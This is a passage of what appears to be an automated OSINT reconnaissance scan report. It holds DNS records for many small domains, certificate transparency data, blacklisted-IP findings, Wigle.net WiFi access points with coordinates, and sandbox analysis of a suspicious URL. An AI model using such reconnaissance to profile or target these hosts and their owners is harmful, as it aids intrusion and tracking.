"2022-11-21T13:38:18.017307639Z"}, "comics.bilardi.net": {"record_type": "CNAME", "resolved_at": "2023-05-08T19:49:11.854401544Z"}, "www.littlejohnengineering.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-17T19:35:20.132850023Z"}, "www.dokomado.com": {"record_type": "CNAME", "resolved_at": "2023-04-21T22:50:25.934348288Z"}, "www.mishamol.ru": {"record_type": "CNAME", "resolved_at": "2023-04-24T22:01:44.486211723Z"}, "alzhao.com": {"record_type": "CNAME", "resolved_at": "2023-03-11T12:58:23.599756683Z"}, "sarahsantiago.com.br": {"record_type": "A", "resolved_at": "2023-02-18T01:39:20.470353293Z"}, "jarrodboone.info": {"record_type": "A", "resolved_at": "2023-03-06T16:41:45.613039480Z"}, "p2sr.github.io": {"record_type": "A", "resolved_at": "2023-03-22T00:24:30.825824556Z"}, "gmacd.net": {"record_type": "A", "resolved_at": "2023-04-27T21:00:21.802895223Z"}, "www.ericdallo.dev": {"record_type": "CNAME", "resolved_at": "2023-03-17T15:48:26.937961924Z"}, "gmacd.github.io": {"record_type": "A", "resolved_at": "2023-03-21T01:31:25.465960326Z"}, "asm.lucasteske.dev": {"record_type": "CNAME", "resolved_at": "2022-11-14T14:35:22.539258750Z"}, "www.jinhankim.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T22:14:08.392069866Z"}, "www.harrisosserman.com": {"record_type": "CNAME", "resolved_at": "2023-02-28T14:03:52.247193728Z"}, "kleinsplayground.com": {"record_type": "A", "resolved_at": "2023-03-22T18:44:01.108063584Z"}, "funmitoblessed.github.io": {"record_type": "A", "resolved_at": "2023-03-22T11:31:23.278745293Z"}, "qfield.org": {"record_type": "A", "resolved_at": "2023-03-12T17:49:56.752630209Z"}, "www.cryptdocs.ml": {"record_type": "CNAME", "resolved_at": "2023-03-19T17:59:09.887768968Z"}, "vighnesh.ninja": {"record_type": "A", "resolved_at": "2023-03-19T17:46:52.312167687Z"}, "agnias47.github.io": {"record_type": "A", "resolved_at": "2023-03-14T15:57:58.140445992Z"}, "gronskiy.com": {"record_type": "A", "resolved_at": 
"2023-03-17T14:05:29.509591628Z"}, "dokomado.com": {"record_type": "A", "resolved_at": "2023-03-12T13:46:45.810442245Z"}, "wise.fitness": {"record_type": "A", "resolved_at": "2023-03-07T15:51:26.458635165Z"}, "www.eknert.com": {"record_type": "CNAME", "resolved_at": "2023-03-09T21:55:19.776247657Z"}, "vesgauniformes.com": {"record_type": "A", "resolved_at": "2023-02-22T15:35:48.205405836Z"}, "millinow.com": {"record_type": "A", "resolved_at": "2022-09-26T14:09:37.255614081Z"}, "jianli.hogancn.com": {"record_type": "CNAME", "resolved_at": "2023-05-10T14:40:00.667151420Z"}, "prohlaseni.altair.blog": {"record_type": "CNAME", "resolved_at": "2023-05-07T12:27:20.143793708Z"}, "wolfgangbai.top": {"record_type": "CNAME", "resolved_at": "2023-03-08T00:37:57.090239320Z"}, "loadout.inkstrike.net": {"record_type": "CNAME", "resolved_at": "2023-04-18T19:24:34.277583383Z"}, "maxkross.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:04.714610636Z"}, "derekmagill.net": {"record_type": "A", "resolved_at": "2023-05-03T19:23:31.613919607Z"}, "arthurkarrer.me": {"record_type": "A", "resolved_at": "2023-03-11T16:57:07.559804549Z"}, "www.adamtroc.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T16:03:03.862526493Z"}, "assets.javierarce.com": {"record_type": "CNAME", "resolved_at": "2023-03-30T15:20:51.562601099Z"}, "varshaprasad.com": {"record_type": "A", "resolved_at": "2023-03-22T11:02:20.888175128Z"}, "mlefree.com": {"record_type": "A", "resolved_at": "2023-03-08T14:17:25.701832947Z"}, "cyberfriendscircle.io": {"record_type": "A", "resolved_at": "2023-04-23T17:40:41.917214504Z"}, "dhanush.is-a.dev": {"record_type": "CNAME", "resolved_at": "2023-03-09T23:39:54.025920340Z"}, "static.test.habuhome.com": {"record_type": "CNAME", "resolved_at": "2023-03-23T15:22:37.725893073Z"}, "sar.portal2.sr": {"record_type": "CNAME", "resolved_at": "2023-03-19T17:40:17.370882551Z"}, "p1nant0m.com": {"record_type": "A", "resolved_at": "2023-03-26T21:40:25.850660596Z"}, 
"www.lainamae.com": {"record_type": "CNAME", "resolved_at": "2023-03-01T14:30:14.030874675Z"}, "tablerpressurewashing.com": {"record_type": "A", "resolved_at": "2023-03-11T12:53:29.882274705Z"}, "www.kadupitiya.lk": {"record_type": "CNAME", "resolved_at": "2023-02-24T16:44:15.687183626Z"}, "robimsinazor.sk": {"record_type": "A", "resolved_at": "2023-02-22T21:18:54.646853756Z"}, "alexndrvega.github.io": {"record_type": "A", "resolved_at": "2023-03-07T16:15:51.452605486Z"}, "wanderandcompass.com": {"record_type": "A", "resolved_at": "2023-03-18T22:39:25.125598440Z"}, "www.runningcode.net": {"record_type": "CNAME", "resolved_at": "2023-05-03T20:11:29.826302413Z"}, "vishvak.com": {"record_type": "A", "resolved_at": "2023-05-11T22:16:52.855230065Z"}, "codelib.alteredlife.co.uk": {"record_type": "CNAME", "resolved_at": "2023-04-17T23:28:22.855144188Z"}, "www.ryjer.net": {"record_type": "CNAME", "resolved_at": "2023-04-04T21:20:41.787316653Z"}, "t.iiwhy.cn": {"record_type": "CNAME", "resolved_at": "2023-03-09T12:46:57.908049390Z"}, "www.fanfit.com.au": {"record_type": "CNAME", "resolved_at": "2023-05-01T12:19:08.882320873Z"}, "rpg.skmobi.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:42:56.247014800Z"}, "lethaltext.ai": {"record_type": "A", "resolved_at": "2023-04-03T12:14:51.572505030Z"}, "felixnrc.github.io": {"record_type": "A", "resolved_at": "2023-03-21T01:32:03.703893737Z"}, "www.staceywu.co.uk": {"record_type": "CNAME", "resolved_at": "2023-03-05T19:59:23.259144477Z"}, "www.brly.net": {"record_type": "CNAME", "resolved_at": "2023-04-08T19:19:47.603414761Z"}, "www.wishingwellberlin.com": {"record_type": "CNAME", "resolved_at": "2023-04-28T17:00:16.833241253Z"}, "intersolarnft.github.io": {"record_type": "A", "resolved_at": "2023-03-10T00:16:10.689229599Z"}, "www.agitator.com": {"record_type": "CNAME", "resolved_at": "2023-04-14T13:20:02.173553830Z"}, "bamru-tech.github.io": {"record_type": "A", "resolved_at": "2023-03-17T16:27:10.957414808Z"}}, 
"names": ["www.felixnrc.ar", "maxkross.github.io", "www.fanfit.com.au", "comics.bilardi.net", "sar.portal2.sr", "cyberfriendscircle.io", "www.maloley.me", "varshaprasad.com", "www.jinhankim.com", "www.wise.fitness", "yomikang.com", "kleinsplayground.com", "lainamae.github.io", "www.umeerrama.com", "derekmagill.net", "intersolarnft.github.io", "dhanush.is-a.dev", "gmacd.net", "elvishenry.github.io", | 185.199.108.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | 200WMadison (Net ID: 00:01:21:30:9B:1A) | 41.8781, -87.6298 |
| 2023-05-12 03:13:08 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [00theway.github.io]
https://www.openphish.com/feed.txt | 00theway.github.io |
| 2023-05-12 02:44:16 | Internet Name | No | DNS Resolver | 4 | 0 | 2 | 0 | None | www.battleb0t.xyz | [{u'pubkey_sha256': u'b1d8ad495b85281ccdd8ee8835d1b0223d8372b54869daf463e92de6ed172160', u'cert_sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'revoked': False, u'not_after': u'2023-05-14T15:23:50Z', u'not_before': u'2023-02-13T15:23:51Z', u'cert': {u'data': u'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', u'sha256': u'3d687aa671181674e4491f35d4a504fe8ede2a23edcb11a1a5f1573f42d7a75d', u'type': u'cert'}, u'dns_names': [u'nuke.battleb0t.xyz'], u'tbs_sha256': u'2c51d3eac2fd15713d1b21dd3bb3fdf96ca51847d8b13529deb5504b935d64ba', u'id': u'4818192950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'2307411ab1a35cbd27d910826dd73a859c805fd0ba153a66badcd9b93076677b', u'cert_sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'revoked': False, u'not_after': u'2023-05-25T03:02:52Z', u'not_before': u'2023-02-24T03:02:53Z', u'cert': {u'data': u'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', u'sha256': u'2cdb8130792ebedf9ac0d58415aa9e7a972b41beabd3a80ba0f9545951c3653a', u'type': u'cert'}, u'dns_names': [u'fluid.battleb0t.xyz'], u'tbs_sha256': u'8146e2bbb69c6bf3a769558c8c5ae10b8e6243d42611ba7db2c4f0b16bf71146', u'id': u'4865007011', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'5a0559923d0fdaac1fc6a74472ffcb94c92e25a29d8d9a48166bcad2947f18e1', u'cert_sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'revoked': False, u'not_after': u'2023-05-25T03:05:10Z', u'not_before': u'2023-02-24T03:05:11Z', u'cert': {u'data': 
u'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', u'sha256': u'9e1451e17fa41309ec5c8a34246eeed3388677fd9907141ad0f5dedc2241e10e', u'type': u'cert'}, u'dns_names': [u'oldfluid.battleb0t.xyz'], u'tbs_sha256': u'11231ecf169618aac453b5e600bca74016c90998389238bc78e25a336ea53b60', u'id': u'4865013513', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afadb5813dcfbcf286d', u'friendly_name': u"Let's Encrypt", u'name': u"C=US, O=Let's Encrypt, CN=R3"}}, {u'pubkey_sha256': u'b65f3ba1cf72aeba89e3a802dee04c06a05e779c0cfeacdd6cb8cefb55c4e2da', u'cert_sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'revoked': False, u'not_after': u'2023-05-26T01:39:24Z', u'not_before': u'2023-02-25T01:39:25Z', u'cert': {u'data': u'MIIFNTCCBB2gAwIBAgISBLY5M6/eHjLz/C523LwIUYYQMA0GCSqGSIb3DQEBCwUAMDIxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJSMzAeFw0yMzAyMjUwMTM5MjVaFw0yMzA1MjYwMTM5MjRaMBgxFjAUBgNVBAMTDWJhdHRsZWIwdC54eXowggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCrxxsM7cYB+Oqps88IF0+iy3w0xGYS5u/zmBd5yWXuZkwfmpJ9M+4H+i4VYve08x/VTy6xZ6hJQr/jzJq3MEbCaPUoqWRpb0xLZCTJ3O1Gn6Qfwu9vNtC8aSe44tYYcEAstPXuj/cNjG4Dkudd1j68u8lbKBCgWvY39eGeFSNybo5pAQmkjKTJ19sFAZBIS5AgjDh6CmB0eRgmMI5gCxe5JKCA3z8UANMJ5zRHNWN8VNKgneFX0csT0zwwJJeO6jQAn8xsDGr3VLxeYNxGMcIJ3tnD42MejxzFkJDo2oa+ffHDHxqGaZsL4LIMRwjIklkrZi/6oTihLxBl9pf9FoczAgMBAAGjggJdMIICWTAOBgNVHQ8BAf8EBAMCBaAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMAwGA1UdEwEB/wQCMAAwHQYDVR0OBBYEFGNOFYVWWqSUAsIWQqSll5o4AleXMB8GA1UdIwQYMBaAFBQusxe3WFbLrlAJQOYfr52LFMLGMFUGCCsGAQUFBwEBBEkwRzAhBggrBgEFBQcwAYYVaHR0cDovL3IzLm8ubGVuY3Iub3JnMCIGCCsGAQUFBzAChhZodHRwOi8vcjMuaS5sZW5jci5vcmcvMCsGA1UdEQQkMCKCDWJhdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6
rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNetFBC6 (Net ID: 00:01:36:5A:FB:C4) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | TraventHome (Net ID: 00:01:24:F0:1D:C3) | 37.7642, -122.3993 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:13 | Internet Name - Unresolved | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | webdisk.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:09:56 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | dgn.keyubu.com | 87.248.157.106 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.15): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | social_msdn (Category: social)<br>https://social.msdn.microsoft.com/profile/login | login |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:20:8C:1A) | 37.7642, -122.3993 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:ED:08:8A) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:38:36 | Blacklisted Affiliate IP Address | Yes | UCEPROTECT | 0 | 0 | 4 | 0 | None | UCEPROTECT - Level 2 (some false positives) (46.101.229.68) | 46.101.229.68 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Twist Studio (Net ID: 00:02:2D:07:96:23) | 37.780462,-122.390564 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.174): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | VEBNG (Net ID: 00:02:6F:75:9C:1E) | 50.1188, 8.6843 |
| 2023-05-12 02:58:57 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
0d:40:8d:d9:7c:a1:bd:4c:0d:06:c5:3f:c3:e9:2e:bc
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Google Trust Services LLC, CN=GTS CA 1P5
Validity
Not Before: Apr 11 04:54:50 2023 GMT
Not After : Jul 10 04:54:49 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:a5:65:fa:d8:79:b7:aa:9f:cd:61:b9:6d:61:bb:
e3:07:27:16:d3:e1:46:58:db:ea:35:f8:26:d8:c8:
09:7e:b6:39:79:12:45:7f:4a:96:c2:65:47:bc:37:
b3:76:46:83:08:24:7b:32:63:f5:07:b6:17:66:20:
18:e4:18:8c:6e:16:7f:bc:81:ec:10:38:cc:20:6d:
2c:d6:29:65:3d:24:15:7a:78:2a:d0:43:3c:46:03:
10:b3:27:47:c6:2c:d9:37:1a:f8:11:aa:82:ad:00:
76:a7:88:0c:2b:f1:1a:b2:9a:95:76:c4:a9:4b:c3:
62:f9:12:87:35:9a:50:60:71:89:06:0b:f5:83:3f:
b3:37:8b:3d:cb:f9:c2:99:ee:99:d3:c8:08:07:e1:
c6:20:fc:1e:cb:95:74:f5:c1:74:33:8b:1b:39:2e:
63:89:98:62:bd:9a:c6:13:b2:b5:95:ec:cb:ee:ce:
27:e7:da:24:f1:8e:b6:e6:ab:e2:7a:20:63:e1:26:
ab:e8:05:03:30:6e:ae:59:d4:02:26:10:36:ee:3d:
2a:f4:c0:78:59:fa:77:cd:2a:88:bd:16:94:1a:e1:
c4:ca:d8:5b:b7:12:2e:db:10:0e:ec:94:77:40:49:
b3:6f:75:18:22:d3:cb:58:3c:44:d0:05:e2:db:a8:
00:c9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BA:51:29:0E:2E:1D:B8:E3:1A:BA:7C:11:8D:3C:69:BB:27:B0:51:A7
X509v3 Authority Key Identifier:
keyid:D5:FC:9E:0D:DF:1E:CA:DD:08:97:97:6E:2B:C5:5F:C5:2B:F5:EC:B8
Authority Information Access:
OCSP - URI:http://ocsp.pki.goog/s/gts1p5/TQXQbT5nMS4
CA Issuers - URI:http://pki.goog/repo/certs/gts1p5.der
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.11129.2.5.3
X509v3 CRL Distribution Points:
Full Name:
URI:http://crls.pki.goog/gts1p5/PX7fR59yV-s.crl
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
35:8a:d2:67:fd:ed:b1:23:72:f0:a2:4c:97:ee:c5:7e:e1:b0:
84:de:17:e3:7f:b0:fd:4c:e4:f5:d9:c1:87:4a:b8:32:d6:97:
13:2d:ab:c3:d8:0c:ce:60:02:7a:3d:d5:8b:4f:9b:89:37:1e:
07:e8:65:4f:13:db:bc:f2:3f:ba:ea:3a:b7:97:d8:a0:c0:4a:
65:8c:35:35:fd:69:77:08:6c:3c:bf:e2:a6:4a:02:ca:fc:ed:
e5:52:89:bc:c1:b6:61:98:79:3c:a3:31:8c:d6:1d:49:4c:6e:
4f:51:4b:80:2f:a3:0a:eb:fd:a0:1d:23:01:9e:b7:13:91:2e:
ea:39:a6:6a:a5:6e:65:a0:60:47:cf:fa:44:01:e4:af:f2:74:
c6:c0:9c:28:45:d7:eb:58:39:c7:39:24:41:f2:f3:e3:a3:aa:
8b:59:5c:05:a1:91:0e:a2:f0:b0:ab:cb:39:e8:59:97:1b:9f:
8d:d8:c2:47:ab:c2:d9:46:03:7a:5d:eb:fd:3e:65:0d:f9:fe:
dc:1b:a2:95:80:34:f0:64:f6:d6:5a:43:e4:2b:5f:53:8b:84:
65:53:97:2f:8f:bb:f4:1d:f8:10:82:18:da:d2:33:31:94:ea:
59:b0:de:49:31:a7:28:65:0c:5e:e7:fb:cf:58:f0:de:70:9b:
5c:67:53:d1
| ayhu.xyz |
| 2023-05-12 03:25:17 | Internet Name | No | DNS Brute-forcer | 0 | 0 | 1 | 0 | None | www.ayhu.xyz | ayhu.xyz |
| 2023-05-12 02:54:16 | Linked URL - Internal | No | Web Spider | 3 | 0 | 2 | 0 | None | https://oldfluid.battleb0t.xyz/ | oldfluid.battleb0t.xyz |
| 2023-05-12 02:51:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'http://email.energypreciousplus.com/?qs=202284189811717324811030210873145040889', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:7728:120:WilError_01"\n "SM0:7728:120:WilError_01"\n "Local\\SM0:7728:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:7728:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"51.38.209.93:80"\n "138.91.254.96:443"\n "104.21.12.87:443"\n "104.21.39.188:443"\n "104.17.24.14:443"\n "104.21.24.239:443"\n "185.199.108.153:443"\n "142.251.46.202:443"\n "142.251.46.163:443"\n "35.190.80.1:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"email.energypreciousplus.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"a.nel.cloudflare.com"\n "api.edgeoffer.microsoft.com"\n "cdnjs.cloudflare.com"\n "email.energypreciousplus.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "inorganik.github.io"\n "k.chasingglitters.com"\n "kyleismyfavorite.com"\n "signaturewithatwist.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: 